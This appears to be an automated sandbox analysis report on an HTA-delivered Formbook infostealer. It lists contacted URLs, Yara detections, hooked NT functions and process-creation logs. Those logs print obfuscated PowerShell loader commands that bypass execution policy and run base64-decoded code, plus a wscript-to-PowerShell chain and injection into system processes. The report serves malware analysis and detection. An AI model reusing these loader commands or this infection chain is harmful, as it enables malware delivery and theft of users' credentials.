                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/Vintage_Car_Auctions.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/__media__/design/underconstructionnotice.php?d=inastra.online
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/__media__/js/trademark.php?d=inastra.online&type=ns
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.inastra.online/display.cfm
                  Source: powershell.exe, 00000003.00000002.2203096096.0000000008A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cjz
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4516216085.0000000006C64000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qmmkl.buzz
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4516216085.0000000006C64000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.qmmkl.buzz/e3vj/
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000003.00000002.2198089199.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                  Source: firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000059A6000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000006006000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://libs.jshub.com/font-awesome/5.10.0-12/css/fontawesome.min.css
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000059A6000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000006006000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://libs.jshub.com/font-awesome/5.10.0-12/css/solid.min.css
                  Source: powershell.exe, 00000003.00000002.2203096096.0000000008A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comJ
                  Source: powershell.exe, 00000003.00000002.2199749880.0000000006336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2473607198.00000000076AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                  Source: powershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt
                  Source: ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000059A6000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000006006000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.ngxfence.com

                  E-Banking Fraud

                  Source: Yara match, File source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'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'+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = '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';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista
                  Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 5988, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
                  Source: C:\Windows\SysWOW64\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04842BF0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842B60 NtClose,LdrInitializeThunk,14_2_04842B60
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04843090 NtSetValueKey,14_2_04843090
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04843010 NtOpenDirectoryObject,14_2_04843010
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842CC0 NtQueryVirtualMemory,14_2_04842CC0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842CF0 NtOpenProcess,14_2_04842CF0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842C00 NtQueryInformationProcess,14_2_04842C00
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842DB0 NtEnumerateKey,14_2_04842DB0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842D00 NtSetInformationFile,14_2_04842D00
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04843D10 NtOpenProcessToken,14_2_04843D10
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04843D70 NtOpenThread,14_2_04843D70
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842EA0 NtAdjustPrivilegesToken,14_2_04842EA0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842E30 NtWriteVirtualMemory,14_2_04842E30
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842F90 NtProtectVirtualMemory,14_2_04842F90
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842FA0 NtQuerySection,14_2_04842FA0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842F60 NtCreateProcessEx,14_2_04842F60
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842AB0 NtWaitForSingleObject,14_2_04842AB0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842B80 NtQueryInformationFile,14_2_04842B80
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_02948B20 NtReadFile,14_2_02948B20
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_029489C0 NtCreateFile,14_2_029489C0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_02948E00 NtAllocateVirtualMemory,14_2_02948E00
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_02948CB0 NtClose,14_2_02948CB0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_02948C10 NtDeleteFile,14_2_02948C10
                  Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 5988, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winHTA@21/17@12/8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\verygreattrafficwithniceworkingskilltobegood[1].tiff
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5rymsdy.m5d.ps1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS"
                  Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: ieUnatt.exe, 0000000E.00000003.2712741290.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2715255764.0000000002A46000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4512419516.0000000002A46000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2715255764.0000000002A1F000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2712848578.0000000002A1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta ReversingLabs: Detection: 18%
                  Source: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta Virustotal: Detection: 24%
                  Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta"
                  Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'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'+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'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'+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5695.tmp" "c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verygreattrafficwithniceworkingskilltobego.vbS"
                  Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = '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';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe Process created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"
                  Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
